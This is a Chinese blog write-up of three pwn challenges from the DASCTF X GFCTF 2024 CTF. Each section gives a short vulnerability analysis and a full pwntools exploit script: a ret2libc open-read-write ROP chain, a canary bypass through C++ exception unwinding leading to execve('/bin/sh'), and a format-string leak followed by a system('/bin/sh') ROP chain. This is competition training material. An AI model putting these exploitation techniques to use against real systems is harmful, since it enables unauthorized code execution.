DASCTF X GFCTF 2024|四月开启第一局

最新推荐文章于 2024-04-21 21:11:30 发布
最新推荐文章于 2024-04-21 21:11:30 发布
阅读量857 收藏 9
点赞数 4
分类专栏: # 每日一“胖“ 文章标签: 简单栈溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/138016224
版权

前言

题目都比较简单,,,没啥好说的,很久没做题了,简单记录一下

dynamic_but_static

  • 仅仅开了 NX 保护
  • 栈溢出

先泄漏 libc 地址,然后栈溢出打 ret2libc,开了沙箱得 orw

from pwn import *
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

#io = process("./pwn")
io = remote("node5.buuoj.cn", 29271)
elf = ELF("./pwn")
libc = ELF("./libc.so.6")

def debug():
    gdb.attach(io)
    pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''


ret     = 0x000000000040101a # ret
pop_rdi = 0x0000000000401381 # pop rdi ; ret
puts_got = 0x404028
puts_plt = 0x4010D0
read_got = 0x404040

#gdb.attach(io, 'b *0x401482')
pay = b'A'*0x38 + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(0x401386)
sl(pay)

#pause()
libc_base = addr8(6) - libc.sym.read #0x1149c0
info("libc_base", libc_base)

o = libc_base + 0x1146d0
r = libc_base + 0x1149c0
w = libc_base + 0x114a60
bss = elf.bss()+0x100
pop_rsi = libc_base + 0x000000000002be51 # pop rsi ; ret
pop_rdx = libc_base + 0x00000000000796a2 # pop rdx ; ret
magic = libc_base + 0x0000000000149515 # add rdx, 2 ; xor eax, eax ; mov qword ptr [rdi], rdx ; ret
leave_ret = 0x0000000000401349 # leave ; ret

info("bss", bss)
info("o", o)
info("r", r)
info("w", w)
info("rsi", pop_rsi)
info("rdx", pop_rdx)

pay = p64(bss-8)*7 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss-8) + p64(pop_rdx) + p64(0x200) + p64(r) + p64(leave_ret)
sl(pay)
#pause()
sleep(1)
pay  = b'./flag\x00\x00' + p64(pop_rdi) + p64(bss-8) + p64(pop_rsi) + p64(0) + p64(o)
pay += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss-0x100) + p64(pop_rdx) + p64(0x30) + p64(r)
pay += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss-0x100) + p64(pop_rdx) + p64(0x30) + p64(w)
sl(pay)
#pause()
#debug()
sh()

在这里插入图片描述

Control

  • 开了 NX 和 Canary
  • 栈溢出
  • 静态链接,所以考虑 ret2syscall
  • 异常处理绕过 Canary 检查

开始可以往 bss 段上写入 16 字节:
在这里插入图片描述
然后 vuln 函数中白给的栈溢出:
在这里插入图片描述
当读入的字节数大于 96 时会进入异常抛出逻辑,这里可以在 main 函数中发现异常捕获逻辑:
在这里插入图片描述
由于 vuln 函数中存在 Canary 保护,所以直接进行栈溢出 ret2syscall 是不可行的,这里我们可以覆盖 ebp 为 gift-8,这里在进行异常捕获时,会进行栈回退,此时就可以将栈劫持到 gift 上,这时我们可以将 rip 去往 gift 上读取 ROP 链,调试发现进行读取时,rdx = 0,而仅仅就 16 字节,所以 pop rdx 用不了,找了一个 magic gadget,调试发现 qword ptr [rsi - 8] 的值为 0x91,其足够写入 ROP 链了

from pwn import *
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

#io = process("./pwn")
io = remote("node5.buuoj.cn", 26739)
elf = ELF("./pwn")
libc = elf.libc

def debug():
    gdb.attach(io)
    pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''

pop_rax = 0x0000000000462c27 # pop rax ; ret
pop_rdi = 0x0000000000401c72 # pop rdi ; ret
pop_rsi = 0x0000000000405285 # pop rsi ; ret
pop_rdx = 0x0000000000401aff # pop rdx ; ret
syscall = 0x000000000040161e # syscall
ret     = 0x000000000040101a # ret
magic   = 0x0000000000446200 # mov rdx, qword ptr [rsi - 8] ; mov qword ptr [rdi - 8], rdx ; ret
gift    = 0x00000000004D3350

#gdb.attach(io, 'b *0x402194')
sda(b'Gift> ', p64(magic) + p64(0x402221))
sda(b'control?\n', p64(gift-8)*15)
pay = p64(gift+8) + p64(pop_rax) + p64(0x3b) + p64(pop_rdi) + p64(gift+0x50) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall) + b'/bin/sh\x00'
sla(b'again', pay)

#pause()
#debug()
sh()

在这里插入图片描述

Exception

  • 保护全开
  • 一个堆上的格式化字符串漏洞
  • 给了栈地址,并且存在栈溢出
  • 异常处理

这题相较于上一题还简单一些,栈地址、libc地址、程序基地址和 canary 都算白给了
在这里插入图片描述
这里 name 上可以输入 0x20 的数据,但是由于保护全开,所以一开始也写不了什么有用的 gadget,只能用来泄漏数据了,这里可以泄漏 libc/栈地址/canary/程序基地址,然后 vuln 中就是一个白给的栈溢出,然后直接抛出异常
在这里插入图片描述
但是这里溢出的字节数足够长,所以这里的抛出异常没有任何影响,直接栈溢出打 ret2libc 即可,但是需要注意的是栈上的数据不要破坏,不如栈退回大概率失败,而且这里劫持的是 main 函数的返回地址,不能劫持 vuln 的返回地址是因为如果修改其返回地址,则导致找不到 catch 块从而导致栈回退失败

from pwn import *
context(arch = 'amd64', os = 'linux')
#context(arch = 'i386', os = 'linux')
#context.log_level = 'debug'

#io = process("./pwn")
io = remote("node5.buuoj.cn", 27800)
elf = ELF("./pwn")
libc = ELF("/pwn/libc.so.6")

def debug():
    gdb.attach(io)
    pause()

sd     = lambda s    : io.send(s)
sda    = lambda s, n : io.sendafter(s, n)
sl     = lambda s    : io.sendline(s)
sla    = lambda s, n : io.sendlineafter(s, n)
rc     = lambda n    : io.recv(n)
rl     = lambda      : io.recvline()
rut    = lambda s    : io.recvuntil(s, drop=True)
ruf    = lambda s    : io.recvuntil(s, drop=False)
addr4  = lambda n    : u32(io.recv(n, timeout=1).ljust(4, b'\x00'))
addr8  = lambda n    : u64(io.recv(n, timeout=1).ljust(8, b'\x00'))
addr32 = lambda s    : u32(io.recvuntil(s, drop=True, timeout=1).ljust(4, b'\x00'))
addr64 = lambda s    : u64(io.recvuntil(s, drop=True, timeout=1).ljust(8, b'\x00'))
byte   = lambda n    : str(n).encode()
info   = lambda s, n : print("\033[31m["+s+" -> "+str(hex(n))+"]\033[0m")
sh     = lambda      : io.interactive()
menu   = b''

#gdb.attach(io, 'b *$rebase(0x1333)')

sla(b'your name\n', b'X%11$pYM%15$pNL%7$pL')
rut(b'X')
lbase = int(rut(b'Y'), 16) - 0x24083
#info("lbase", lbase)

rut(b'M')
base = int(rut(b'N'), 16) - 0x1360
#info("base", base)

rut(b'L')
canary = int(rut(b'L'), 16)
#info("canary", canary)

rut(b'stack\n')
stack = int(rut(b'\n'), 16)
#info("stack", stack)

pop_rdi = lbase + 0x0000000000023b6a # pop rdi ; ret
pop_rsi = lbase + 0x000000000002601f # pop rsi ; ret
pop_rdx = lbase + 0x0000000000119431 # pop rdx ; pop r12 ; ret
system  = lbase + libc.sym.system
binsh   = lbase + next(libc.search(b'/bin/sh\x00'))
ret     = lbase + 0x0000000000022679 # ret

pay  = p64(lbase+0x1ed6a0) + p64(base+0x206d) + p64(base+0x4020) + p64(lbase+0x1e94a0)
pay += p64(0) + p64(lbase+0x90e93) + p64(0x18) + p64(lbase+0x1ed6a0) + p64(base+0x206d)
pay += p64(lbase+0x8459a) + p64(base+0x1480) + p64(stack+0xa0) + p64(base+0x1180)
pay += p64(canary) + p64(stack+0xa0)
pay += p64(base+0x1408) + p64(0) + p64(canary) + p64(stack+0x190) + p64(0)*2
pay += p64(pop_rdi) + p64(binsh) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0)*2 + p64(system)
print(hex(len(pay)))
sda(b'exception?', pay)

#pause()
#debug()
sh()
sh()

在这里插入图片描述

XiaozaYa
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
2020 DASCTF四月春季战-misc
weixin_43952190的博客
04-26 1903
misc 0x01 签到题 5G都来了,6G还远吗?6G下还需要开会员才能高速下载吗?请提交 DASCTF{} 里的内容。 下载发现有将近1G。作为签到题应该不需要这样做。 按下F12,接收到payload。 payload如下: REFTQ1RGe3dlbGNvbWVfdG9fREFTX0FwMXIxfc9Vo4jQqwH4ON+olEgxiijIjbgcdJur4VZjq9WlhUI...
【Web】DASCTF X GFCTF 2024四月开启第一局 题解(全)
uuzeray的博客
04-20 2164
康好康的图片功能可以打SSRF,不能直接读本地文件,比如/etc/paswd /proc/1/environ。后来题目给了hint让打session反序列化(不是我寻思你附件也妹给session_start啊)大体思路就是先反序列化给record.php写入
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2497
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF部分复现
qq_63928796的博客
08-08 2284
过滤了大括号 {{,我们可以用 {%print(......)%} 或 {% if ... %}1{% endif %} 的形式来代替,但是题目还过滤了 print 关键字,所以前者用不了了,只能用 {% if ... %}success{% endif %} 的形式来bypass了。因为whatisthis里头的数字,有的很大,我们尝试生成一个小数点长度在10000的圆周率出来,看看能得到什么,圆周率生成的脚本用的是下面这个网址的大佬的脚本。首先利用FTK挂载一下vmdk文件,得到加密的磁盘。...
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 4996
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF2022 ——十月赛 Web 部分Writeup
渗透测试研究中心
10-28 1440
EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public起点是 sorry 类的__destruct(), 由echo $this->hint调用到 show 类的__toString()方法, 然后通过执行$this->ctf->show()跳转 secret_code 类的__call(), 进而到show()方法, ...
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
2004225e9ff0cd86ee4.pcapng
10-09
blueshrak,2020 DASCTF四月春季战备份数据包
Ant & SVN task script
11-17
it's very article which introduece svn task work with ant script in your project.
DASCTF X GFCTF 2024 Control爆破解法
2303_79701639的博客
04-20 583
最开始写的时候尝试进入二次异常处理,但是会卡住中间的某个函数调用上,尝试在布置rop的时候恢复数据,但是仍然不行,最后选择爆破。在unwind内部会把控制权转移给对应的catch代码,而且这一部分是没有canary的,也就是直接绕开了canary保护。而且栈上面的数据给的很好,在read内部sp+28的部分刚好没有清除,用作了leave的返回地址。,第一次是不能布置完整ROP的,还是必须通过栈劫持的方式去read函数内部进行二次读入。选择爆破bp的返回地址,00覆盖最后一位,让bp转到bss上面。
DASCTF 2022九月赛WEB
weixin_43952190的博客
09-22 759
CTF
DASCTF X GFCTF 2024四月开启第一局 —— re前三题wp
最新发布
Air_cat的博客
04-21 677
DASCTF X GFCTF 2024四月开启第一局 re前三题writeup
DASCTF 2023 & 0X401七月暑期挑战赛-Crypto复现
Emmaaaaa's blog
07-24 878
关键词:光滑数,Franklin-Reiter相关消息攻击,copper求t,groebner_basis() 之前做过相关消息攻击的题,但都是那种一眼就能看出来的,这次遇到两道不寻常的,值得记录,求解方法也更加多元化了哈哈,只能说还有待提高,继续加油吧!
DASCTF X GFCTF 2022十月挑战赛 学习记录
m0_64815693的博客
10-24 2117
DASCTF X GFCTF 2022十月挑战赛
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 337
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
安恒月赛 DASCTF 7月赛
pone2233的博客
07-25 1179
文章目录比赛介绍比赛感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比赛结束了 比赛介绍 安恒月赛 DASCTF 7月赛 比赛感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战和乐趣的比赛。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值